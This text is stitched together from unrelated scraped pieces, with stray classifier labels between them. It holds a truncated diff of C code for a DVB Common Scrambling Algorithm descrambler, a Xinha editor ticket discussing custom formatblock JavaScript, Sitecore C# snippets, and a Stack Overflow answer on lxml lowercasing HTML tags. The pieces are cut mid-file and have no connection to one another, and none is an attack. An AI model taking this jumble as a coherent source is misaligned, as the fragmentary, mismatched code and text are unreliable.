if(r<GROUP_PARALLELISM+5) r=GROUP_PARALLELISM+5; 507 return r; 508 } 509 510 //-----key structure 511 512 void *get_key_struct(void){ 513 struct csa_keys_t *keys=(struct csa_keys_t *)MALLOC(sizeof(struct csa_keys_t)); 514 if(keys) { 515 static const unsigned char pk[8] = { 0,0,0,0,0,0,0,0 }; 516 set_control_words(keys,pk,pk); 517 } 518 return keys; 519 } 520 521 void free_key_struct(void *keys){ 522 return FREE(keys); 523 } 524 525 //-----set control words 526 527 static void schedule_key(struct csa_key_t *key, const unsigned char *pk){ 528 // could be made faster, but is not run often 529 int bi,by; 530 int i,j; 531 // key 532 memcpy(key->ck,pk,8); 533 // precalculations for stream 534 key_schedule_stream(key->ck,key->iA,key->iB); 535 for(by=0;by<8;by++){ 536 for(bi=0;bi<8;bi++){ 537 key->ck_g[by][bi]=(key->ck[by]&(1<<bi))?FF1():FF0(); 538 } 539 } 540 for(by=0;by<8;by++){ 541 for(bi=0;bi<4;bi++){ 542 key->iA_g[by][bi]=(key->iA[by]&(1<<bi))?FF1():FF0(); 543 key->iB_g[by][bi]=(key->iB[by]&(1<<bi))?FF1():FF0(); 544 } 545 } 546 // precalculations for block 547 key_schedule_block(key->ck,key->kk); 548 for(i=0;i<56;i++){ 549 for(j=0;j<BYTES_PER_BATCH;j++){ 550 *(((unsigned char *)&key->kkmulti[i])+j)=key->kk[i]; 551 } 552 } 553 } 554 555 void set_control_words(void *keys, const unsigned char *ev, const unsigned char *od){ 556 schedule_key(&((struct csa_keys_t *)keys)->even,ev); 557 schedule_key(&((struct csa_keys_t *)keys)->odd,od); 558 } 559 560 void set_even_control_word(void *keys, const unsigned char *pk){ 561 schedule_key(&((struct csa_keys_t *)keys)->even,pk); 562 } 563 564 void set_odd_control_word(void *keys, const unsigned char *pk){ 565 schedule_key(&((struct csa_keys_t *)keys)->odd,pk); 566 } 567 568 //-----get control words 569 570 void get_control_words(void *keys, unsigned char *even, unsigned char *odd){ 571 memcpy(even,&((struct csa_keys_t *)keys)->even.ck,8); 572 memcpy(odd,&((struct csa_keys_t *)keys)->odd.ck,8); 573 } 574 575 //----- decrypt 576 577 int decrypt_packets(void *keys, unsigned char **cluster){ 578 // statistics, currently unused 579 int stat_no_scramble=0; 580 int stat_reserved=0; 581 int stat_decrypted[2]={0,0}; 582 int stat_decrypted_mini=0; 583 unsigned char **clst; 584 unsigned char **clst2; 585 int grouped; 586 int group_ev_od; 587 int advanced; 588 int can_advance; 589 unsigned char *g_pkt[GROUP_PARALLELISM]; 590 int g_len[GROUP_PARALLELISM]; 591 int g_offset[GROUP_PARALLELISM]; 592 int g_n[GROUP_PARALLELISM]; 593 int g_residue[GROUP_PARALLELISM]; 594 unsigned char *pkt; 595 int xc0,ev_od,len,offset,n,residue; 596 struct csa_key_t* k; 597 int i,j,iter,g; 598 int t23,tsmall; 599 int alive[24]; 600 //icc craziness int pad1=0; //////////align! FIXME 601 unsigned char *encp[GROUP_PARALLELISM]; 602 MEMALIGN unsigned char stream_in[GROUP_PARALLELISM*8]; 603 MEMALIGN unsigned char stream_out[GROUP_PARALLELISM*8]; 604 MEMALIGN unsigned char ib[GROUP_PARALLELISM*8]; 605 MEMALIGN unsigned char block_out[GROUP_PARALLELISM*8]; 606 #ifdef COPY_UNALIGNED_PKT 607 unsigned char *unaligned[GROUP_PARALLELISM]; 608 MEMALIGN unsigned char alignedBuff[GROUP_PARALLELISM][188]; 609 #endif 610 struct stream_regs regs; 611 612 //icc craziness i=(int)&pad1;//////////align!!! FIXME 613 614 // build a list of packets to be processed 615 clst=cluster; 616 grouped=0; 617 advanced=0; 618 can_advance=1; 619 group_ev_od=-1; // silence incorrect compiler warning 620 pkt=*clst; 621 do{ // find a new packet 622 if(grouped==GROUP_PARALLELISM){ 623 // full 624 break; 625 } 626 if(pkt==NULL){ 627 // no more ranges 628 break; 629 } 630 if(pkt>=*(clst+1)){ 631 // out of this range, try next 632 clst++;clst++; 633 pkt=*clst; 634 continue; 635 } 636 637 do{ // handle this packet 638 xc0=pkt[3]&0xc0; 639 DBG(fprintf(stderr," exam pkt=%p, xc0=%02x, can_adv=%i\n",pkt,xc0,can_advance)); 640 if(xc0==0x00){ 641 DBG(fprintf(stderr,"skip clear pkt %p (can_advance is %i)\n",pkt,can_advance)); 642 advanced+=can_advance; 643 stat_no_scramble++; 644 break; 645 } 646 if(xc0==0x40){ 647 DBG(fprintf(stderr,"skip reserved pkt %p (can_advance is %i)\n",pkt,can_advance)); 648 advanced+=can_advance; 649 stat_reserved++; 650 break; 651 } 652 if(xc0==0x80||xc0==0xc0){ // encrypted 653 ev_od=(xc0&0x40)>>6; // 0 even, 1 odd 654 if(grouped==0) group_ev_od=ev_od; // this group will be all even (or odd) 655 if(group_ev_od==ev_od){ // could be added to group 656 pkt[3]&=0x3f; // consider it decrypted now 657 if(pkt[3]&0x20){ // incomplete packet 658 offset=4+pkt[4]+1; 659 len=188-offset; 660 n=len>>3; 661 residue=len-(n<<3); 662 if(n==0){ // decrypted==encrypted! 663 DBG(fprintf(stderr,"DECRYPTED MINI! (can_advance is %i)\n",can_advance)); 664 advanced+=can_advance; 665 stat_decrypted_mini++; 666 break; // this doesn't need more processing 667 } 668 }else{ 669 len=184; 670 offset=4; 671 n=23; 672 residue=0; 673 } 674 g_pkt[grouped]=pkt; 675 g_len[grouped]=len; 676 g_offset[grouped]=offset; 677 g_n[grouped]=n; 678 g_residue[grouped]=residue; 679 DBG(fprintf(stderr,"%2i: eo=%i pkt=%p len=%03i n=%2i residue=%i\n",grouped,ev_od,pkt,len,n,residue)); 680 grouped++; 681 advanced+=can_advance; 682 stat_decrypted[ev_od]++; 683 } 684 else{ 685 can_advance=0; 686 DBG(fprintf(stderr,"skip pkt %p and can_advance set to 0\n",pkt)); 687 break; // skip and go on 688 } 689 } 690 } while(0); 691 692 if(can_advance){ 693 // move range start forward 694 *clst+=188; 695 } 696 // next packet, if there is one 697 pkt+=188; 698 } while(1); 699 DBG(fprintf(stderr,"-- result: grouped %i pkts, advanced %i pkts\n",grouped,advanced)); 700 701 // delete empty ranges and compact list 702 clst2=cluster; 703 for(clst=cluster;*clst!=NULL;clst+=2){ 704 // if not empty 705 if(*clst<*(clst+1)){ 706 // it will remain 707 *clst2=*clst; 708 *(clst2+1)=*(clst+1); 709 clst2+=2; 710 } 711 } 712 *clst2=NULL; 713 714 if(grouped==0){ 715 // no processing needed 716 return advanced; 717 } 718 719 // sort them, longest payload first 720 // we expect many n=23 packets and a few n<23 721 DBG(fprintf(stderr,"PRESORTING\n")); 722 for(i=0;i<grouped;i++){ 723 DBG(fprintf(stderr,"%2i of %2i: pkt=%p len=%03i n=%2i residue=%i\n",i,grouped,g_pkt[i],g_len[i],g_n[i],g_residue[i])); 724 } 725 // grouped is always <= GROUP_PARALLELISM 726 727 #define g_swap(a,b) \ 728 pkt=g_pkt[a]; \ 729 g_pkt[a]=g_pkt[b]; \ 730 g_pkt[b]=pkt; \ 731 \ 732 len=g_len[a]; \ 733 g_len[a]=g_len[b]; \ 734 g_len[b]=len; \ 735 \ 736 offset=g_offset[a]; \ 737 g_offset[a]=g_offset[b]; \ 738 g_offset[b]=offset; \ 739 \ 740 n=g_n[a]; \ 741 g_n[a]=g_n[b]; \ 742 g_n[b]=n; \ 743 \ 744 residue=g_residue[a]; \ 745 g_residue[a]=g_residue[b]; \ 746 g_residue[b]=residue; 747 748 // step 1: move n=23 packets before small packets 749 t23=0; 750 tsmall=grouped-1; 751 for(;;){ 752 for(;t23<grouped;t23++){ 753 if(g_n[t23]!=23) break; 754 } 755 DBG(fprintf(stderr,"t23 after for =%i\n",t23)); 756 757 for(;tsmall>=0;tsmall--){ 758 if(g_n[tsmall]==23) break; 759 } 760 DBG(fprintf(stderr,"tsmall after for =%i\n",tsmall)); 761 762 if(tsmall-t23<1) break; 763 764 DBG(fprintf(stderr,"swap t23=%i,tsmall=%i\n",t23,tsmall)); 765 766 g_swap(t23,tsmall); 767 768 t23++; 769 tsmall--; 770 DBG(fprintf(stderr,"new t23=%i,tsmall=%i\n\n",t23,tsmall)); 771 } 772 DBG(fprintf(stderr,"packets with n=23, t23=%i grouped=%i\n",t23,grouped)); 773 DBG(fprintf(stderr,"MIDSORTING\n")); 774 for(i=0;i<grouped;i++){ 775 DBG(fprintf(stderr,"%2i of %2i: pkt=%p len=%03i n=%2i residue=%i\n",i,grouped,g_pkt[i],g_len[i],g_n[i],g_residue[i])); 776 } 777 778 // step 2: sort small packets in decreasing order of n (bubble sort is enough) 779 for(i=t23;i<grouped;i++){ 780 for(j=i+1;j<grouped;j++){ 781 if(g_n[j]>g_n[i]){ 782 g_swap(i,j); 783 } 784 } 785 } 786 DBG(fprintf(stderr,"POSTSORTING\n")); 787 for(i=0;i<grouped;i++){ 788 DBG(fprintf(stderr,"%2i of %2i: pkt=%p len=%03i n=%2i residue=%i\n",i,grouped,g_pkt[i],g_len[i],g_n[i],g_residue[i])); 789 } 790 791 // we need to know how many packets need 23 iterations, how many 22... 792 for(i=0;i<=23;i++){ 793 alive[i]=0; 794 } 795 // count 796 alive[23-1]=t23; 797 for(i=t23;i<grouped;i++){ 798 alive[g_n[i]-1]++; 799 } 800 // integrate 801 for(i=22;i>=0;i--){ 802 alive[i]+=alive[i+1]; 803 } 804 DBG(fprintf(stderr,"ALIVE\n")); 805 for(i=0;i<=23;i++){ 806 DBG(fprintf(stderr,"alive%2i=%i\n",i,alive[i])); 807 } 808 809 // choose key 810 if(group_ev_od==0){ 811 k=&((struct csa_keys_t *)keys)->even; 812 } 813 else{ 814 k=&((struct csa_keys_t *)keys)->odd; 815 } 816 817 //INIT 818 //#define INITIALIZE_UNUSED_INPUT 819 #ifdef INITIALIZE_UNUSED_INPUT 820 // unnecessary zeroing. 821 // without this, we operate on uninitialized memory 822 // when grouped<GROUP_PARALLELISM, but it's not a problem, 823 // as final results will be discarded. 824 // random data makes debugging sessions difficult. 825 for(j=0;j<GROUP_PARALLELISM*8;j++) stream_in[j]=0; 826 DBG(fprintf(stderr,"--- WARNING: you could gain speed by not initializing unused memory ---\n")); 827 #else 828 DBG(fprintf(stderr,"--- WARNING: DEBUGGING IS MORE DIFFICULT WHEN PROCESSING RANDOM DATA CHANGING AT EVERY RUN! ---\n")); 829 #endif 830 831 for(g=0;g<grouped;g++){ 832 encp[g]=g_pkt[g]; 833 DBG(fprintf(stderr,"header[%i]=%p (%02x)\n",g,encp[g],*(encp[g]))); 834 encp[g]+=g_offset[g]; // skip header 835 #ifdef COPY_UNALIGNED_PKT 836 if(((int)encp[g])&0x03) { 837 memcpy(alignedBuff[g],encp[g],g_len[g]); 838 unaligned[g]=encp[g]; ... This diff was truncated because it exceeds the maximum size that can be displayed.
__label__pos
0.630313
Opened 8 years ago Closed 8 years ago #1541 closed defect (fixed) Allow more flexible configuration for formatblock options Reported by: ejucovy Owned by: gogo Priority: normal Milestone: 0.97 Component: Xinha Core Version: trunk Severity: normal Keywords: Cc: Description On my site we added a formatblock option "Pullquote." This wraps the selection in a <div class="pullquote">, and we have CSS that floats it to the right. We had to modify XinhaCore.js internals to support this option to formatblock, for the following reasons: 1. Since we're applying HTML that isn't just a tag name, we can't use a simple string to represent it in the formatblock config. Instead we had to provide a callback function to do the modification. 2. Since other formatblock styles like heading, subheading, etc can be applied to elements within a pullquote, we had to use custom logic for detecting whether the current context is within a pullquote or not. 3. We also had to use custom logic to deal with users selecting the "normal" option when the current context is within a pullquote, since that should remove the pullquote. The attached patch is what we came up with. Currently the formatblock config's values are strings (HTML tag names) always. With the patch they can instead be objects with three items: • tag: string, HTML tag name to be applied • detect: callback function(xinha, el), with boolean return value, called to determine if the current cursor context is within this formatblock option • invoke: callback function(xinha), which is executed (instead of execCommand) when the formatblock option is selected I don't love this patch .. it seems poorly encapsulated, and I don't like putting so much code in the config.js -- I'd rather register it in a plugin somehow. But I'm not sure how to take a better approach. The attached patch also contains the snippet from our xinhaconfig.js, to demonstrate the use. Attachments (2) formatblock.diff (3.0 KB) - added by guest 8 years ago. formatblock.2.diff (3.1 KB) - added by ejucovy 8 years ago. a much simpler patch that lets me accomplish the same thing more elegantly Download all attachments as: .zip Change History (9) Changed 8 years ago by guest comment:1 Changed 8 years ago by guest Actually, instead of cluttering the patch with the example usage, I'll just put it here -- this is our xinha_config.formatblock setting, with the "sidebar" option that requires the submitted patch. (Note that the patch is fully backwards-compatible.) xinha_config.formatblock = { 'Normal' : {tag: 'p', invoker: function (xinha) { var blockquote = null var firstparent = xinha.getParentElement(); if (firstparent.tagName != 'H2' && firstparent.tagName != 'H3' && firstparent.tagName != 'PRE') { blockquote = firstparent; while (blockquote !== null && blockquote.className.trim() != 'pullquote') { blockquote = blockquote.parentNode; } } if (blockquote) { var blockParent = blockquote.parentNode; var firstChild = null; while (blockquote.childNodes.length) { if (firstChild === null) { firstChild = blockquote.childNodes[0]; } blockParent.insertBefore(blockquote.childNodes[0], blockquote); } blockParent.removeChild(blockquote); if (firstChild !== null) { // FIXME: this selects the entire first node, instead of just placing the // cursor at the beginning (or at the previous location where the cursor was). // Without this, the cursor hangs off to the side of the screen, where the // blockquote once had been. xinha.selectNodeContents(firstChild); } } else { if( !Xinha.is_gecko) { xinha.execCommand('formatblock', false, '<p>'); } else { xinha.execCommand('formatblock', false, 'p'); } } }, // always return false, to give others a chance to override // if nobody else thinks they should be selected, then it will default // to normal because it comes first detect: function(xinha, el) { return false; } }, 'Heading' : 'h2', 'Subheading' : 'h3', 'Pre-formatted' : 'pre', 'Sidebar' : {tag: 'div', invoker: function (xinha) { var el = xinha.getParentElement(); if (el.tagName.toUpperCase() == 'BODY') { //put div around selection if (xinha.hasSelectedText()){ selhtml = xinha.getSelectedHTML(); newhtml = '<div class="pullquote">' + selhtml + '</div>'; xinha.insertHTML(newhtml); } } else { //put div around current block while (el !== null & !Xinha.isBlockElement(el)){ el = el.parentNode; } if (el) { el_parent = el.parentNode; div = xinha._doc.createElement('div'); div.className = "pullquote"; el_parent.replaceChild(div, el); div.appendChild(el); } } xinha.updateToolbar() }, detect: function (xinha, el) { while (el !== null) { if (el.nodeType == 1 && el.tagName.toUpperCase() == 'DIV') { return /\bpullquote\b/.test(el.className); } el = el.parentNode; } return false; } } }; Changed 8 years ago by ejucovy a much simpler patch that lets me accomplish the same thing more elegantly comment:2 Changed 8 years ago by ejucovy • Cc ejucovy@… removed • Milestone set to 0.97 • Reporter changed from guest to ejucovy Oof. I've attached a better patch that accomplishes the same thing with much fewer (and completely localized!) core changes, and a much simpler configuration framework. The two big realizations that allowed me to simplify were: 1. For the actual work of performing a custom/complex formatblock command, we can call out to a plugin's onExecCommand("formatblock", false, "<mycustomcommand>") event hook. The plugin's onExecCommand method just needs to listen for cmdID=="formatblock" plus whatever custom commands it wants to handle, and return true after handling them (to prevent core from trying to handle the command). 2. The core code for figuring out which formatblock pulldown option to mark as selected, is duplicating logic: first it calls editor._getFirstAncestor(el, array_of_tag_names_or_detection_functions) and then, if any of the elements from that array match, it iterates through that same array to figure out which item in it was the match. If we just modify the signature of editor._getFirstAncestor to return both the ancestor and the index of the matching item, this code can look a lot simpler. comment:3 Changed 8 years ago by ejucovy And, with this new patch, here's my snippet of configuration (equivalent to the one posted above in comment:1, but much cleaner I think) var execNoSidebar = function (xinha) { var blockquote = null var firstparent = xinha.getParentElement(); if (firstparent.tagName != 'H2' && firstparent.tagName != 'H3' && firstparent.tagName != 'PRE') { blockquote = firstparent; while (blockquote !== null && blockquote.className.trim() != 'pullquote') { blockquote = blockquote.parentNode; } } if (blockquote) { var blockParent = blockquote.parentNode; var firstChild = null; while (blockquote.childNodes.length) { if (firstChild === null) { firstChild = blockquote.childNodes[0]; } blockParent.insertBefore(blockquote.childNodes[0], blockquote); } blockParent.removeChild(blockquote); if (firstChild !== null) { // FIXME: this selects the entire first node, instead of just placing the // cursor at the beginning (or at the previous location where the cursor was). // Without this, the cursor hangs off to the side of the screen, where the // blockquote once had been. xinha.selectNodeContents(firstChild); } } else { if( !Xinha.is_gecko) { xinha.execCommand('formatblock', false, '<p>'); } else { xinha.execCommand('formatblock', false, 'p'); } } }; var execSidebar = function( xinha ) { var el = xinha.getParentElement(); if (el.tagName.toUpperCase() == 'BODY') { //put div around selection if (xinha.hasSelectedText()){ selhtml = xinha.getSelectedHTML(); newhtml = '<div class="pullquote">' + selhtml + '</div>'; xinha.insertHTML(newhtml); } } else { //put div around current block while (el !== null & !Xinha.isBlockElement(el)) { el = el.parentNode; } if (el) { el_parent = el.parentNode; div = xinha._doc.createElement('div'); div.className = "pullquote"; el_parent.replaceChild(div, el); div.appendChild(el); } } xinha.updateToolbar() }; xinha_config.formatblock = { 'Normal': 'nosidebar', 'Heading': 'h2', 'Subheading': 'h3', 'Pre-formatted': 'pre', 'Sidebar': 'sidebar' }; xinha_config.Events.onExecCommand = function(cmdID, UI, param) { if( cmdID != 'formatblock' ) { return false; } if( param != '<nosidebar>' && param != '<sidebar>' ) { return false; } if( param == '<nosidebar>' ) { execNoSidebar(this); return true; } if( param == '<sidebar>' ) { execSidebar(this); return true; } }; xinha_config.formatblockDetector['nosidebar'] = function() { return false; }; xinha_config.formatblockDetector['sidebar'] = function(xinha, el) { console.log("fleem"); while (el !== null) { if (el.nodeType == 1 && el.tagName.toUpperCase() == 'DIV') { console.log(el); return /\bpullquote\b/.test(el.className); } el = el.parentNode; } return false; }; comment:4 Changed 8 years ago by ejucovy The patch still needs some cleanup and better self-documentation, but I think this is a reasonable approach now. Certainly it's on the right track, closer than the original patch. But, I should see what I think of it after I've gotten some sleep.. comment:5 Changed 8 years ago by ejucovy To help summarize the changes here and what they'd accomplish, I wrote a tutorial-style article, on how to configure the formatblock dropdown with custom options: http://www.coactivate.org/projects/xinha/custom-formatblock-options I'm happy with this approach now -- it uses existing infrastructure where possible, and the new configuration option that it adds is unobtrusive and pretty self-explanatory. There are a lot of moving parts for a user to keep track of if he wants to do this customization (as the article shows!) but I think it has a good separation of concerns, and when it's done the whole thing can be packaged up nicely in a plugin. Of course most users won't ever want to do this. But it works well for those who do. I can also imagine (pretty easily) another layer being built in the future which simplifies some of this and packages it together more closely, to make it a little easier for a user to accomplish. There's no need to build that now, but it could even be built as a plugin to experiment first. comment:6 Changed 8 years ago by ejucovy In r1289, I committed the first part of my patch. This doesn't add any functionality or new configuration options. It just refactors editor._getFirstAncestor by moving that method's logic into a new function, editor._getFirstAncestorAndWhy. The new function returns a 2-item array: the second item is an integer index, which, combined with the "types" argument that was passed in to the function, can be used to identify what tag-or-callback the returned "first ancestor" matched. _getFirstAncestor still has the same interface as before -- it just calls _getFirstAncestorAndWhy, throws away the second element from the resulting array, and returns the first. This simplifies, and slightly optimizes, the formatblock logic in updateToolbar -- which previously repeated the whole "matching" logic that had just been done in _getFirstAncestor. comment:7 Changed 8 years ago by ejucovy • Resolution set to fixed • Status changed from new to closed After mulling it over for a few days I'm still pretty happy with this approach, so I've committed r1296 which adds the xinha_config.formatblockDetector option. Note: See TracTickets for help on using tickets.
__label__pos
0.98346
Skip to content Instantly share code, notes, and snippets. SiteContext targetSiteContext = SiteContext.GetSite(sitename); using (var context = new SiteContextSwitcher(targetSiteContext)) { // do something on the new site context Item myItem = context.Database.GetItem("ID"); } public static class TemplateItemExtensions { public static IEnumerable<TemplateFieldItem> GetFieldsOfSelfAndBaseTemplates(this TemplateItem self) { var templateFieldItems = new Dictionary<ID, TemplateFieldItem>(); GetAllFieldsForTemplate(self, templateFieldItems); return templateFieldItems.Values; } using Sitecore.Form.Core.Attributes; using System; using System.ComponentModel; using System.Web.UI; namespace CustomWFFM.CustomFieldTypes { [ValidationProperty("Text")] public class SingleLineTextWithPlaceholderField : Sitecore.Form.Web.UI.Controls.SingleLineText { Template template = TemplateManager.GetTemplate(new ID(""), Sitecore.Context.Database); TemplateField[] allFields = template.GetFields(true); using System; using System.Text.RegularExpressions; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Pipelines.ExpandInitialFieldValue; namespace CustomExpandTokenProcessors.Pipelines { public class QueryTokenReplacer : ExpandInitialFieldValueProcessor { using System.ComponentModel; using Sitecore.Data.Items; namespace CustomWFFM.CustomFieldTypes.Mvc { public class SingleLineTextWithPlaceholderField : Sitecore.Forms.Mvc.Models.Fields.SingleLineTextField { [DefaultValue("")] public string PlaceholderText { get; set; } @using Sitecore.Mvc @model CustomWFFM.CustomFieldTypes.Mvc.SingleLineTextWithPlaceholderField @if (!Model.Visible) { return; } <div class="@Model.CssClass field-border"> using System.Linq; using Sitecore.Configuration; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Pipelines.ExpandInitialFieldValue; namespace CustomExpandTokenProcessors.Pipelines { public class NextSortOrderReplacer : ExpandInitialFieldValueProcessor { <?xml version="1.0" encoding="utf-8" ?> <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <pipelines> <expandInitialFieldValue> <processor type="CustomExpandTokenProcessors.Pipelines.MyCustomTokenReplacer, CustomExpandTokenProcessors" patch:after="processor[@type='type=Sitecore.Pipelines.ExpandInitialFieldValue.ReplaceVariables, Sitecore.Kernel']"/> </expandInitialFieldValue> </pipelines> </sitecore> </configuration> using Sitecore.Diagnostics; using Sitecore.Pipelines.ExpandInitialFieldValue; namespace CustomExpandTokenProcessors.Pipelines { public class CustomTokenReplacer : ExpandInitialFieldValueProcessor { private const string Token = "$customtoken"; public override void Process(ExpandInitialFieldValueArgs args)
__label__pos
0.985338
Is it possible to downgrade your OS? Discussion in 'Mac OS X 10.3 (Panther) Discussion' started by wowoah, Mar 7, 2005. 1. wowoah macrumors regular Joined: Jul 16, 2003 Location: Berkeley, CA #1 Since I installed 10.3.8, my PowerBook has been crashing nonstop. I don't know if it's 10.3.8's fault, but I want to see if I can downgrade to 10.3.7 and see if that solves anything. Does anyone know how to do this? Thanks.   2. Sun Baked macrumors G5 Sun Baked Joined: May 19, 2002 #2 Try safe booting your Mac (hold shift key) or creating a new user to see if that eliminates your crashes. It's quite possible the 10.3.8 update broke one of the old programs or kext files that you're using -- and is causing a lot of crashes.   3. wrldwzrd89 macrumors G5 wrldwzrd89 Joined: Jun 6, 2003 Location: Solon, OH #3 Downgrades are not possible normally. The only way to downgrade is to restore to the base version of the OS you wish to downgrade to (or whatever came with your Mac if you haven't upgraded since you bought it), then update to the desired minor version of that OS. Keep in mind that you can't downgrade to anything older than what your Mac came with. I'd try Sun Baked's suggestions before mine, though.   4. Applespider macrumors G4 Applespider Joined: Jan 20, 2004 Location: looking through rose-tinted spectacles... #4 Some people have reported that re-installing 10.3.8 using the Combo updated from Apple's website rather than the incremental upgrade that you likely did through Software update cured stability problems with 10.3.8. Worth a shot?   5. Soulstorm macrumors 68000 Soulstorm Joined: Feb 1, 2005 #5 Yes,it does. That solved a lot of my problems, and kernel panics seem to have stoped. Coincidence?   Share This Page
__label__pos
0.944822
5 Does the use of heavy graphics/images (with img tag or in the CSS) effect a site's Google ranking? Sometimes sites are heavy because of the images used or Flash or lots of JavaScript - making the loading times higher. Does the loading time also effect a site's Google ranking? I've mentioned Google, but the question applies to all search engines. 5 Yes, but it's not a heavily weighted parameter. 0 0 I would be more worried about the users. If load times are high than users would leave the site and we all know that search engines put a lot of weight behind user experience i.e. bounce rates, avg time spent etc so, it's very important to keep these in check! 1 • 2 The first half of your answer is good but the second half is off target. Search engines don't know bounce rate or time on site so how can they use them in their algorithms? Not to mention neither are an accurate indication of quality. – John Conde May 29 '11 at 1:04 Your Answer By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.906857
17148 upper case html tags encoded in lxml Question: I am parsing an html file using lxml.html....The html file contains tags with small case letters and also large case letters. A part of my code is shown below: response = urllib2.urlopen(link) html = response.read().decode('cp1251') content_html = etree.HTML(html_1) first_link_xpath = content_html.xpath('//TR') print (first_link_xpath) A small part of my HTML file is shown below: <TR> <TR vAlign="top" align="left"> <!--<TD><B onmouseover="tips.Display('Metadata_WEB', event)" onmouseout="tips.Hide('Metadata_WEB')">Meta Data:</B></TD>--> <TD></TD> </TR> </TR> So when i run my above code for the below html sample, it gives an empty list. Then i tried to run this line first_link_xpath = content_html_1.xpath('//tr/node()') , all the upper case tags were represented as \r\n\t\t\t\t' in the output: What is the reason behind this issue?? NOte: If the question is not convincing please let me know for modification Answer1: To follow up on unutbu's answer, I suggest you compare lxml XML and HTML parsers, especially how they represent documents by asking a representation of the tree back using lxml.etree.tostring(). You can see the different tags, tags case and hierarchy (which may be different than what a human would think ;) $ python >>> import lxml.etree >>> doc = """<TR> ... <TR vAlign="top" align="left"> ... <!--<TD><B onmouseover="tips.Display('Metadata_WEB', event)" onmouseout="tips.Hide('Metadata_WEB')">Meta Data:</B></TD>--> ... <TD></TD> ... </TR> ... </TR>""" >>> xmldoc = lxml.etree.fromstring(doc) >>> xmldoc <Element TR at 0x1e79b90> >>> htmldoc = lxml.etree.HTML(doc) >>> htmldoc <Element html at 0x1f0baa0> >>> lxml.etree.tostring(xmldoc) '<TR>\n <TR vAlign="top" align="left">\n <!--<TD><B onmouseover="tips.Display(\'Metadata_WEB\', event)" onmouseout="tips.Hide(\'Metadata_WEB\')">Meta Data:</B></TD>-->\n <TD/>\n </TR>\n </TR>' >>> lxml.etree.tostring(htmldoc) '<html><body><tr/><tr valign="top" align="left"><!--<TD><B onmouseover="tips.Display(\'Metadata_WEB\', event)" onmouseout="tips.Hide(\'Metadata_WEB\')">Meta Data:</B></TD>--><td/>\n </tr></body></html>' >>> You can see that with the HTML parser, it created enclosing html and body tags, and there is an empty tr node at the beginning, since in HTML a tr cannot directly follow a tr (the HTML fragment you provided is broken, either by a typo error, or the original document is also broken) Then, again as suggested by unutbu, you can tryout the different XPath expressions: >>> xmldoc.xpath('//tr') [] >>> xmldoc.xpath('//TR') [<Element TR at 0x1e79b90>, <Element TR at 0x1f0baf0>] >>> xmldoc.xpath('//TR/node()') ['\n ', <Element TR at 0x1f0baf0>, '\n ', <!--<TD><B onmouseover="tips.Display('Metadata_WEB', event)" onmouseout="tips.Hide('Metadata_WEB')">Meta Data:</B></TD>-->, '\n ', <Element TD at 0x1f0bb40>, '\n ', '\n '] >>> >>> htmldoc.xpath('//tr') [<Element tr at 0x1f0bbe0>, <Element tr at 0x1f0bc30>] >>> htmldoc.xpath('//TR') [] >>> htmldoc.xpath('//tr/node()') [<!--<TD><B onmouseover="tips.Display('Metadata_WEB', event)" onmouseout="tips.Hide('Metadata_WEB')">Meta Data:</B></TD>-->, <Element td at 0x1f0bbe0>, '\n '] >>> An indeed, as unutbu stressed, for HTML, XPath expressions should use lower-case tags to select elements. To me, '\r\n\t\t\t\t' output is not an error, it's simply the whitespace between the various tr and td tags. For text content, if you don't want this whitespace, you can use lxml.etree.tostring(element, memthod="text", encoding=unicode).strip(), where element comes from XPath for example. (this works for leading and trailing whitespace). (Note that the method argument is important, by default, it will output the HTML representation as tested above) >>> map(lambda element: lxml.etree.tostring(element, method="text", encoding=unicode), htmldoc.xpath('//tr')) [u'', u'\n '] >>> And you can verify that the text representation is all whitespace. Answer2: The HTML parser converters all tag names to lower case. This is why xpath('//TR') returns an empty list. I'm not able to reproduce the second problem, where upper case tags get printed as \r\n\t\t\t\t'. Can you modify the code below to demonstrate the problem? import lxml.etree as ET content = '''\ <TR> <TR vAlign="top" align="left"> <!--<TD><B onmouseover="tips.Display('Metadata_WEB', event)" onmouseout="tips.Hide('Metadata_WEB')">Meta Data:</B></TD>--> <TD></TD> </TR> </TR>''' root = ET.HTML(content) print(root.xpath('//TR')) # [] print(root.xpath('//tr/node()')) # [<!--<TD><B onmouseover="tips.Display('Metadata_WEB', event)" onmouseout="tips.Hide('Metadata_WEB')">Meta Data:</B></TD>-->, <Element td at 0xb77463ec>, '\n '] print(root.xpath('//tr')) # [<Element tr at 0xb77462fc>, <Element tr at 0xb77463ec>] Recommend • Pandas multi-index subtract from value based on value in other column • creating password field in oracle • Simple linked list-C • Reading a file into a multidimensional array • CakePHP ACL tutorial initDB function warnings • Android application: how to use the camera and grab the image bytes? • Query to find the duplicates between the name and number in table • How can I speed up CURL tasks? • How do I exclude a dependency in provided scope when running in Maven test scope? • Jackson Parser: ignore deserializing for type mismatch • Is there a way to do normal logging with EureakLog? • Time complexity of a program which involves multiple variables • Admob requires api-13 or later can I not deploy on old API-8 phones? • Test if a set exists before trying to drop it • How to use remove-erase idiom for removing empty vectors in a vector? • How to clear text inside text field when radio button is select • Spark fat jar to run multiple versions on YARN • Read a local file using javascript • Avoid links criss cross / overlap in d3.js using force layout • Asynchronous UI Testing in Xcode With Swift • Scrapy recursive link crawler • Repeat a vertical line on every page in Report Builder / SSRS • Why is an OPTIONS request sent to the server? • Spring Data JPA custom method causing PropertyReferenceException • Using $this when not in object context • NetLogo BehaviorSpace - Measure runs using reporters • How to make a tree having multiple type of nodes and each node can have multiple child nodes in java • How do I fake an specific browser client when using Java's Net library? • How reduce the height of an mschart by breaking up the y-axis • Perl system calls when running as another user using sudo • SVN: Merging two branches together • Hibernate gives error error as “Access to DialectResolutionInfo cannot be null when 'hibernate. • Unanticipated behavior • How to CLICK on IE download dialog box i.e.(Open, Save, Save As…) • Can Visual Studio XAML designer handle font family names with spaces as a resource? • Turn off referential integrity in Derby? is it possible? • Add sale price programmatically to product variations • How can i traverse a binary tree from right to left in java? • Unable to use reactive element in my shiny app • How do I use LINQ to get all the Items that have a particular SubItem?
__label__pos
0.722655
